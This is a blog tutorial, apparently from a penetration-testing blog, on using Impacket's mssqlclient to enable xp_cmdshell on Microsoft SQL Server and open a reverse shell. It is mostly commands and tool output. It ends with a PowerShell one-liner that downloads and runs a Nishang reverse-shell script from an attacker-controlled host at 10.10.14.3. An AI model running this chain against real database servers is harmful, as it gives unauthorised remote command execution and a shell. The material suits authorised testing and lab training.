Impacket-MSSQLClient Reverse shell

I would like to share about creating reverse shell with Impacket mssqllient which utilize the functionality of xp_cmdshell.

You can install impacket from its github that is available https://github.com/SecureAuthCorp/impacket

I have shared the tutorial in order to do xp_cmdshell activation manually in this url https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell/ and https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell-with-nishang/

With the Impacket mssqlclient you will not need to do manual things such as building the query in SQL scripting language in order to activate the xp_cmdshell. Impacket makes the things easier for you.

You can connect to the database using this command

mssqlclient.py rio_services@192.168.12.1 -windows-auth
[*] Encryption required, switching to TLS                                                                                                                                
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master                                                                                                            
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english                                                                                                          
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192                                                                                                             
[*] INFO(RIODB): Line 1: Changed database context to 'master'.                                                                                                         
[*] INFO(RIODB): Line 1: Changed language setting to us_english.                                                                                                       
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)                                                                                                                     
[!] Press help for extra shell commands   

If you type help and you will get information like below

SQL> help                                                                                                                                                                
                                                                                                                                                                         
     lcd {path}                 - changes the current local directory to {path}                                                                                          
     exit                       - terminates the server process (and this session)                                                                                       
     enable_xp_cmdshell         - you know what it means                                                                                                                 
     disable_xp_cmdshell        - you know what it means                                                                                                                 
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell                                                                                                         
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)                                                                                        
     ! {cmd}                    - executes a local shell cmd  

You need to run the enable_xp_cmdshell in order for you to run the remote execution.

SQL> enable_xp_cmdshell                                                                                                                                                  
[*] INFO(RIODB): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.                                 
[*] INFO(RIODB): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

There will out put like the above but actually you dont need to run the RECONFIGURE command since Impacket has done it for you.

The next thing is if you want to create reverse shell then you can just do the below command to connect back to your netcat server defined in the nishang powershell script

SQL> xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://10.10.14.3:8000/rv.ps1\")

the above command is reverse shell using nishang framework. you can find the detail how to prepare nishang reverse shell in my previous tutorial.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s